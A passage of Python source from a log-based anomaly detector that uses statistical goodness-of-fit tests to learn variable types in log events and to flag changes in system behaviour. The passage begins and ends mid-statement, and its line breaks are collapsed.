len(self.var_type) # Create the initial lists which derive from the persistence # Number of variables of the single events self.length = [len(self.event_type_detector.variable_key_list[event_index]) for event_index in range(self.num_events)] self.variable_path_num = [[] for _ in range(self.num_events)] # List of the successes of the binomialtest for the rejection in the s_gof or variables of discrete type self.bt_results = [[[] for var_index in range(self.length[event_index])] for event_index in range(self.num_events)] # Updates the lists for each eventType individually for event_index in range(self.num_events): # Adds the variable indices to the variable_path_num-list if the target_path_list is not empty if self.target_path_list is not None: for var_index in range(self.length[event_index]): if self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list: self.variable_path_num[event_index].append(var_index) # Initializes the lists for the discrete distribution, or continuous distribution for var_index, var_val in enumerate(self.var_type[event_index]): if len(var_val) > 0: if var_val[0] in self.distr_list: self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if var_val[0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) elif var_val[0] == 'd': self.d_init_bt(event_index, var_index) def process_ll(self, event_index, log_atom): """Process the log line. Extracts and appends the values of the log line to the values-list.""" # Return if no variable is tracked in the VTD if len(self.event_type_detector.variable_key_list[event_index]) == 0 or ( self.target_path_list is not None and self.variable_path_num[event_index] == []): return # Initial detection of variable types if self.event_type_detector.num_event_lines[event_index] >= self.num_init and \ self.event_type_detector.check_variables[event_index][0] and self.var_type[event_index][0] == []: # Test all variables logging.getLogger(DEBUG_LOG_NAME).debug('%s started initial detection of var types.', self.__class__.__name__) if self.target_path_list is None: for var_index in range(self.length[event_index]): tmp_var_type = self.detect_var_type(event_index, var_index) # VarType is empiric distribution if tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # Mark the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type # Test only the variables with paths in the target_path_list else: for var_index in self.variable_path_num[event_index]: tmp_var_type = self.detect_var_type(event_index, var_index) # VarType is empiric distribution if tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # VarType is range elif tmp_var_type[0] == 'range': self.var_type[event_index][var_index] = tmp_var_type # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # mMrk the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type self.init_var_type_history_list(event_index) self.print_initial_var_type(event_index, log_atom) self.log_new_learned += len(self.var_type[event_index]) self.log_new_learned_values.append(self.var_type[event_index]) # Update variable types elif self.event_type_detector.num_event_lines[event_index] > self.num_init and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: logging.getLogger(DEBUG_LOG_NAME).debug('%s started update phase of var types.', self.__class__.__name__) # Check if the updates of the variable types should be stopped if self.learn_mode and (not isinstance(self.num_stop_update, bool)) and ( self.event_type_detector.total_records >= self.num_stop_update): self.learn_mode = False # Get the index_list for the variables which should be updated index_list = None if self.target_path_list is None: index_list = range(self.length[event_index]) else: index_list = self.variable_path_num[event_index] self.log_updated += len(index_list) # Update the variable types and history list for var_index in index_list: # Skips the variable if check_variable is False if not self.event_type_detector.check_variables[event_index][var_index]: continue # Update variable types self.update_var_type(event_index, var_index, log_atom) # This section updates the history list of the variable types if self.var_type[event_index][var_index][0] in self.var_type_history_list_order: # Index of the variable type in the list # [others, static, [discrete, number of appended steps], # asc, desc, unique, range, ev of continuous distributions] type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0]) else: type_index = self.var_type_history_list_order.index('cont') for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]): if tmp_type_index == type_index: if self.var_type_history_list_order[type_index] == 'cont': for _, val in enumerate(tmp_type_val): val.append(0) # Continuously distributed variable type. if self.var_type[event_index][var_index][0] == 'uni': tmp_type_val[0][-1] = ( self.var_type[event_index][var_index][1] + self.var_type[event_index][var_index][2]) / 2 tmp_type_val[1][-1] = ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) / np.sqrt(12) else: tmp_type_val[0][-1] = self.var_type[event_index][var_index][1] tmp_type_val[1][-1] = self.var_type[event_index][var_index][2] elif self.var_type_history_list_order[type_index] == 'range': tmp_type_val[0].append(self.var_type[event_index][var_index][1]) tmp_type_val[1].append(self.var_type[event_index][var_index][2]) elif len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): tmp_type_val[0].append(1) for i in range(1, len(tmp_type_val)): # skipcq: PTC-W0060 tmp_type_val[i].append(0) else: tmp_type_val.append(1) else: if len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): for _, val in enumerate(tmp_type_val): val.append(0) else: tmp_type_val.append(0) # Reduce the number of variables, which are tracked if (self.num_updates_until_var_reduction > 0 and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update == self.num_updates_until_var_reduction - 1): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): # Skips the variable if it is already not being checked if not self.event_type_detector.check_variables[event_index][var_index]: continue tmp_max = 1 exceeded_thresh = False for type_index in range(1, len(var_val)): # skipcq: PTC-W0060 # Continuous Distribution if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: num_app = len([1 for x in var_val[type_index][1] if x != 0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Distributions which are neither continuous nor range else: if len(var_val[type_index]) >= 1 and isinstance(var_val[type_index][0], list): num_app = sum(var_val[type_index][0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app else: num_app = sum(var_val[type_index]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Remove the variable if it did not exceed the threshold if not exceeded_thresh: self.event_type_detector.check_variables[event_index][var_index] = False self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] self.distr_val[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len( self.var_type_history_list_reference[event_index]) > var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print( f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with ' f'Path:\n{affected_path}\nbecause of irregular variable types.', log_atom, affected_path, confidence=1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085) # 1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085 is the scaled sigmoidfunction. # 1 / (1 + np.exp(-4)) = 0.9820137900379085 # Saves the initial reference state of the var_type_history_list for the calculation of the indicator if ((self.num_updates_until_var_reduction == 0) or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance(self.num_var_type_hist_ref, bool)) and ( (len(self.var_type_history_list_reference) < event_index + 1) or self.var_type_history_list_reference[event_index] == []) and ( (self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_var_type_hist_ref - 1): if len(self.var_type_history_list_reference) < event_index + 1: for i in range(event_index + 1 - len(self.var_type_history_list_reference)): self.var_type_history_list_reference.append([]) for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index].append([]) for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): # Continuous variable type if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][-self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append([sum(x[ -self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum(type_val[-self.num_var_type_hist_ref:])) # Check the indicator for the variable types of the Event and generates an output, if it fails else: if ((self.num_updates_until_var_reduction == 0) or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance( self.num_var_type_considered_ind, bool)) and (not isinstance(self.num_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) > event_index and (self.var_type_history_list_reference[event_index] != []) and ( ((self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_var_type_considered_ind) == 0: # Shorten the var_type_history_list if len(self.var_type_history_list[event_index]) > 0 and len(self.var_type_history_list[event_index][0]) > 0 and len( self.var_type_history_list[event_index][0][0]) > max( self.num_var_type_considered_ind, self.num_var_type_hist_ref): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): for type_index, type_val in enumerate(var_val): # Differentiation between the entries, which are lists (e.g. discrete) and values if isinstance(type_val[0], list): for i, val in enumerate(type_val): if isinstance(val, list): type_val[i] = val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] else: var_val[type_index] = type_val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] indicator_list = self.get_indicator(event_index) indicator = max(0, max(indicator_list)) if indicator >= self.indicator_thres: # Update the list of the failed indicators, which is used for the weights of the indicator if len(self.failed_indicators) < event_index + 1: # Extend the lists if necessary tmp_len = len(self.failed_indicators) for i in range(event_index + 1 - tmp_len): self.failed_indicators.append([[] for _ in range(len(self.var_type[tmp_len + i]))]) # Indices of the variables, which would have failed the indicator indices_failed_tests = [] for var_index in range(len(self.var_type[event_index])): # skipcq: PTC-W0060 if indicator_list[var_index] >= self.indicator_thres: indices_failed_tests.append(var_index) self.failed_indicators[event_index][var_index].append(self.event_type_detector.num_event_lines[event_index]) # Multiply the single values of the indicator with their corresponding weights # Number of the log line which corresponds to the first indicator, which is taken into account first_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * (self.num_ind_for_weights + self.num_skipped_ind_for_weights) # Number of the log line which corresponds to the last indicator, which is taken into account last_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * self.num_skipped_ind_for_weights for var_index in indices_failed_tests: lower_ind = False # Index of the lower limit of the considered values of the failed_indicator list upper_ind = False # Index of the upper limit of the considered values of the failed_indicator list for i, val in enumerate(self.failed_indicators[event_index][var_index]): if val >= first_line_num: lower_ind = i break if isinstance(lower_ind, bool): lower_ind = 0 upper_ind = 0 else: for i, val in enumerate(self.failed_indicators[event_index][var_index], start=lower_ind): if val >= last_line_num: upper_ind = i break if isinstance(upper_ind, bool): upper_ind = len(self.failed_indicators[event_index][var_index]) # Calculating the weight for the indicator indicator_weight = 1 / (1 + upper_ind - lower_ind) indicator_list[var_index] = indicator_list[var_index] * indicator_weight # Reduce the list of the failed indicators self.failed_indicators[event_index][var_index] = self.failed_indicators[event_index][var_index][lower_ind:] # Calculate and print the confidence of the failed indicator indicator = sum(indicator_list[var_index] for var_index in indices_failed_tests) if self.save_statistics: if log_atom.atom_time is not None: self.failed_indicators_total.append(log_atom.atom_time) else: self.failed_indicators_total.append(time.time()) self.failed_indicators_values.append(np.arctan(2 * indicator) / np.pi * 2) if self.event_type_detector.id_path_list != []: self.failed_indicators_paths.append(self.event_type_detector.id_path_list_tuples[event_index]) else: self.failed_indicators_paths.append(self.event_type_detector.longest_path[event_index]) tmp_string = '' affected_paths = [self.event_type_detector.variable_key_list[event_index][var_index] for var_index in indices_failed_tests] if self.var_type_history_list: tmp_string += f'Event {self.event_type_detector.get_event_type(event_index)}: ' tmp_string += f'Indicator of a change in system behaviour: {np.arctan(2 * indicator) / np.pi * 2}. Paths to' \ f' the corresponding variables: {affected_paths}' self.print(tmp_string, log_atom, affected_paths, np.arctan(2 * indicator) / np.pi * 2, indicator=True) # Update the var_type_history_list_reference if self.learn_mode and (not isinstance(self.num_var_type_hist_ref, bool)) and ( not isinstance(self.num_update_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) >= event_index + 1 and \ self.var_type_history_list_reference[event_index] != [] and ((( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_update_var_type_hist_ref == 0): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index][var_index] = [] for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Continuous or range variable type # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][ -self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][ -self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append( [sum(x[-self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum( type_val[-self.num_var_type_hist_ref:])) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time def detect_var_type(self, event_index, var_index): """Give back the assumed variable type of the variable with the in self.event_type_detector stored values.""" # Values which are being tested values = self.event_type_detector.values[event_index][var_index][-self.num_init:] # Unique values values_set = set(values) # Number of unique values num_diff_vals = len(values_set) if num_diff_vals == 1: return ['stat', list(values_set), False] # List of floats or False float_values = convert_to_floats(values) is_int = False if len(float_values) > 0: is_int = consists_of_ints(float_values) # Values are integer numbers if len(float_values) > 0: previous_val = float_values[0] asc = True desc = True # Test for ascending for v in float_values[1:]: if previous_val > v: asc = False break previous_val = v previous_val = float_values[0] # Test for descending for v in float_values[1:]: if previous_val < v: desc = False break previous_val = v if asc: if is_int: return ['asc', 'int'] return ['asc', 'float'] if desc: if is_int: return ['desc', 'int'] return ['desc', 'float'] # Checking if no integers should be tested and if the values are integers if not self.test_gof_int and is_int: float_values = [] if len(float_values) > 0 and (num_diff_vals > self.div_thres * self.num_init): float_values_mean = np.mean(float_values) dw_result = durbin_watson([val - float_values_mean for val in float_values]) if dw_result < self.crit_val_dw[self.dw_alpha][len(float_values)] or\ dw_result > 4 - self.crit_val_dw[self.dw_alpha][len(float_values)]: var_type = self.calculate_value_range(float_values) else: # test for a continuous distribution. If none fits, the function will return ['d'] var_type = self.detect_continuous_shape(float_values) else: # discrete var type var_type = ['d'] # Test for discrete, unique and others if var_type == ['d']: if self.num_init == num_diff_vals and (len(float_values) == 0 or is_int): # unique var type return ['unq', values] if num_diff_vals >= self.num_init * (1 - self.sim_thres): # Values do not follow a specific pattern, the second entry is the number of update runs without a new type. return ['others', 0] # Initialize the discrete type values_set = list(values_set) values_app = [0 for _ in range(num_diff_vals)] for value in values: values_app[values_set.index(value)] += 1 values_app = [x / len(values) for x in values_app] # discrete var type return ['d', values_set, values_app, len(values)] return var_type def detect_continuous_shape(self, values): """ Detect if the sample follows one of the checked continuous distribution and returns the found type in a fitting format. ['d'] if none fit. """ # List of the p-values of the distributions significance = [] # List of the tested distributions distribution = [] # Converts the floats/integer to an array for faster manipulations and tests values = np.array(values) if self.used_gof_test == 'KS': # Test for uniform distribution min_val = min(values) max_val = max(values) if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'uni'] / kstest(values, 'uniform', args=(min_val, max_val - min_val))[0]) distribution.append(['uni', min_val, max_val]) else: significance.append(kstest(values, 'uniform', args=(min_val, max_val - min_val))[1]) distribution.append(['uni', min_val, max_val]) # Test for normal distribution # Getting the expected value and sigma [ev, sigma] = norm.fit(values) # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'nor'] / kstest((values - ev) / sigma, 'norm')[0]) distribution.append(['nor', ev, sigma, min_val, max_val]) else: significance.append(kstest((values - ev) / sigma, 'norm')[1]) distribution.append(['nor', ev, sigma, min_val, max_val]) # Test for beta distribution # (0.5*0.5/((0.5+0.5+1)(0.5+0.5)^2))^(1/2) = 2.82842712 ev_tmp = (min_val + max_val) / 2 sigma_tmp = (max_val - min_val) / 2.82842712 if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta1'] / kstest((values-min_val)/(max_val-min_val), 'beta', args=(0.5, 0.5))[0]) distribution.append(['beta', ev_tmp, sigma_tmp, min_val, max_val, 1]) else: significance.append(kstest((values-min_val)/(max_val-min_val), 'beta', args=(0.5, 0.5))[1]) distribution.append(['beta', ev_tmp, sigma_tmp, min_val, max_val, 1]) # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: # Beta 2 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta2'] / kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+5/(5+2), 'beta', args=(5, 2))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 2]) # Beta 3 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta2'] / kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+2/(5+2), 'beta', args=(2, 5))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 3]) # Beta 4 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta4'] / kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+1/(1+5), 'beta', args=(1, 5))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Beta 5 significance.append(self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][ 'beta4'] / kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+5/(1+5), 'beta', args=(5, 1))[0]) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) else: # Beta 2 significance.append(kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+5/(5+2), 'beta', args=(5, 2))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 2]) # Beta 3 significance.append(kstest((values-ev)/sigma*pow(5*2/(5+2+1), 1/2)/(5+2)+2/(5+2), 'beta', args=(2, 5))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 3]) # Beta 4 significance.append(kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+1/(1+5), 'beta', args=(1, 5))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Beta 5 significance.append(kstest((values-ev)/sigma*pow(1*5/(1+5+1), 1/2)/(1+5)+5/(1+5), 'beta', args=(5, 1))[1]) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) # Crit value for the self generated or mixed distributions crit_val = pow(-np.log(self.gof_alpha) * 3 / self.num_init / 4, 1 / 2) est_penalty = 1.4 # Estimated penalty for the adapted ev and SD # Test for the mixed beta distribution # ev/sigma of Beta 4: ev=1/(1+5) sigma=pow(1*5/(1+5+1),1/5)/(1+5) # sigma in [sigmaBetam1,sigmaBetam2] if 1 / 6 < (ev - min_val) / (max_val - min_val) < 5 / 6: # Interpolate the expected distribution functions threw the sigma in the interval proportion = ((ev - min_val) / (max_val - min_val) - 5 / 6) / (-4 / 6) tmp_index = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))] if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(ks_2samp([self.quantiles['betam1'][i] for i in tmp_index] + [self.quantiles['betam2'][ i] for i in range(1000) if i not in tmp_index], (values - min_val) / (max_val - min_val))[0] / crit_val * est_penalty) distribution.append(['betam', min_val, max_val - min_val, min_val, max_val, proportion]) else: significance.append(ks_2samp([self.quantiles['betam1'][i] for i in tmp_index] + [self.quantiles['betam2'][ i] for i in range(1000) if i not in tmp_index], (values - min_val) / (max_val - min_val))[1]) distribution.append(['betam', min_val, max_val - min_val, min_val, max_val, proportion]) # Test for alternative distribution # KS-test of the standardised values and the distribution if self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]: significance.append(ks_2samp(self.quantiles['spec'], (values - ev) / sigma)[0] / crit_val * est_penalty) distribution.append(['spec', ev, sigma, min_val, max_val, 0]) significance.append( ks_2samp(self.quantiles['spec'], -(values - ev) / sigma)[0] / crit_val * est_penalty) distribution.append(['spec', ev, sigma, min_val, max_val, 1]) else: significance.append(ks_2samp(self.quantiles['spec'], (values - ev) / sigma)[1]) distribution.append(['spec', ev, sigma, min_val, max_val, 0]) significance.append(ks_2samp(self.quantiles['spec'], -(values - ev) / sigma)[1]) distribution.append(['spec', ev, sigma, min_val, max_val, 1]) # Check if one of the above tested continuous distribution fits if max(significance) >= self.gof_alpha: sort_indices = np.argsort(significance) sort_list = [] for i in range(len(sort_indices) - 2, -1, -1): if significance[sort_indices[i]] >= self.gof_alpha: sort_list.append(distribution[sort_indices[i]]) return distribution[sort_indices[-1]] + [sort_list] if self.used_gof_test == 'CM': min_val = min(values) max_val = max(values) [ev, sigma] = norm.fit(values) # Test for uniform distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.min_mod_ini_uni-self.max_mod_ini_uni) + self.min_mod_ini_uni, 'uniform') / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['uni']) distribution.append(['uni', min_val - self.min_mod_ini_uni / (1-self.min_mod_ini_uni-self.max_mod_ini_uni) * (max_val-min_val), max_val + self.max_mod_ini_uni / (1-self.min_mod_ini_uni-self.max_mod_ini_uni) * (max_val-min_val)]) # Test for normal distribution significance.append(cramervonmises((values-ev) / sigma, 'norm') / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['nor']) distribution.append(['nor', ev, sigma, min_val, max_val]) # Test for beta1 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) + self.min_mod_ini_beta1, 'beta', args=(0.5, 0.5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta1']) distribution.append(['beta', ev, sigma, min_val - self.min_mod_ini_beta1 / (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) * (max_val-min_val), max_val + self.max_mod_ini_beta1 / (1-self.min_mod_ini_beta1-self.max_mod_ini_beta1) * (max_val-min_val), 1]) # Test for beta2 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) + self.min_mod_ini_beta2, 'beta', args=(5, 2)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta2']) distribution.append(['beta', ev, sigma, min_val - self.min_mod_ini_beta2 / (1-self.min_mod_ini_beta2-self.max_mod_ini_beta2) * (max_val-min_val), max_val + self.max_mod_ini_beta2 / (1-self.min_mod_ini_beta2-self.max_mod_ini_beta2) * (max_val-min_val), 2]) # Test for beta3 distribution significance.append(cramervonmises((values-min_val) / (max_val-min_val) * (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) + self.max_mod_ini_beta2, 'beta', args=(2, 5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta2']) distribution.append(['beta', ev, sigma, min_val - self.max_mod_ini_beta2 / (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) * (max_val-min_val), max_val + self.min_mod_ini_beta2 / (1-self.max_mod_ini_beta2-self.min_mod_ini_beta2) * (max_val-min_val), 3]) # Test for beta4 distribution significance.append(cramervonmises((values-min_val) / (ev-min_val) * (1/6-self.min_mod_ini_beta4) + self.min_mod_ini_beta4, 'beta', args=(1, 5)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta4']) distribution.append(['beta', ev, sigma, min_val, max_val, 4]) # Test for beta5 distribution significance.append(cramervonmises((values-max_val) / (max_val-ev) * (1/6-self.min_mod_ini_beta4) + 1 - self.min_mod_ini_beta4, 'beta', args=(5, 1)) / self.crit_val_ini_cm[self.gof_alpha][self.num_init]['beta4']) distribution.append(['beta', ev, sigma, min_val, max_val, 5]) # Check if one of the above tested continuous distribution fits if min(significance) <= 1: sort_indices = np.argsort(significance) sort_list = [] for i in sort_indices[1:]: if significance[i] >= self.gof_alpha: sort_list.append(distribution[i]) return distribution[sort_indices[0]] + [sort_list] if self.use_empiric_distr: return ['emp', ev, sigma, []] # discrete if no distribution fits return ['d'] def calculate_value_range(self, values): """Calculate the lower and upper limit of the expected values through the mean and standard deviation of the given values.""" if self.used_range_test == 'MeanSD': # Calculate the mean and standard deviation of the test sample [ev, sigma] = norm.fit(values) # Estimate distance of the mean ot the limits with the quantiles of the normal distribution. ev_dist = sigma * norm.ppf(self.range_alpha / 2) # Calculate lower and upper limit lower_limit = ev + ev_dist * self.range_limits_factor upper_limit = ev - ev_dist * self.range_limits_factor elif self.used_range_test == 'EmpiricQuantiles': # Sort values values.sort() # Calculate lower and upper limit lower_limit = values[0] - (values[int(len(values) * (0.5 - self.range_alpha / 2) + 0.5)] - values[0]) * self.range_limits_factor upper_limit = values[-1] - ( values[-1 - int(len(values) * (0.5 - self.range_alpha / 2) + 0.5)] - values[-1]) * self.range_limits_factor else: # self.used_range_test == 'MinMax' # Sort values values.sort() # Calculate lower and upper limit lower_limit = values[0] - (values[-1] - values[0]) * (0.5 - self.range_alpha / 2) * self.range_limits_factor upper_limit = values[-1] + (values[-1] - values[0]) * (0.5 - self.range_alpha / 2) * self.range_limits_factor return ['range', lower_limit, upper_limit, 0] def update_var_type(self, event_index, var_index, log_atom): """Test if the new num_update values fit the detected var type and updates the var type if the test fails.""" # Getting the new values and saving the old distribution for printing-purposes if the test fails new_values = self.event_type_detector.values[event_index][var_index][-self.num_update:] VT_old = copy.deepcopy(self.var_type[event_index][var_index]) # Test and update for continuous distribution if self.var_type[event_index][var_index][0] in self.distr_list: if not consists_of_floats(new_values): # A value is not a float or integer, so the new assigned type is others # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, 1.0) return # first_distr is used to test the current distribution with the BT and to discard the alternative distributions if they # fail the s_gof-test once first_distr = True s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # Calculate the confidence as the stretched sigmaoid function of the maximal value of the step fct # 1 / (1 + np.exp(-2)) = 1.1353352832366128 confidence = 1 / (1 + np.exp(-2 * s_gof_result[1])) * 1.1353352832366128 while not s_gof_result[0]: # If the test fails a new shape is searched for in the alternative distributions self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [0] # Update the results of the BT first_distr = False # Check if the BT is applicable and if it holds if first_distr and (sum(self.bt_results[event_index][var_index]) >= self.s_gof_bt_min_success): return if not self.learn_mode: # Do not update variable type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return if len(self.alternative_distribution_types[event_index][var_index]) != 0: # There is at least one alternative distribution # Initializes the distributionvalues and bucketnumbers self.var_type[event_index][var_index] = self.alternative_distribution_types[event_index][var_index][0] self.alternative_distribution_types[event_index][var_index] = self.alternative_distribution_types[event_index][ var_index][1:] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # There is no alternative distribution. The var type is set to others else: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, confidence) return # Check if the s_gof_test was successful and remark the success if first_distr: self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [1] # Print a message if the vartype has changed if VT_old != self.var_type[event_index][var_index]: self.print_changed_var_type(event_index, 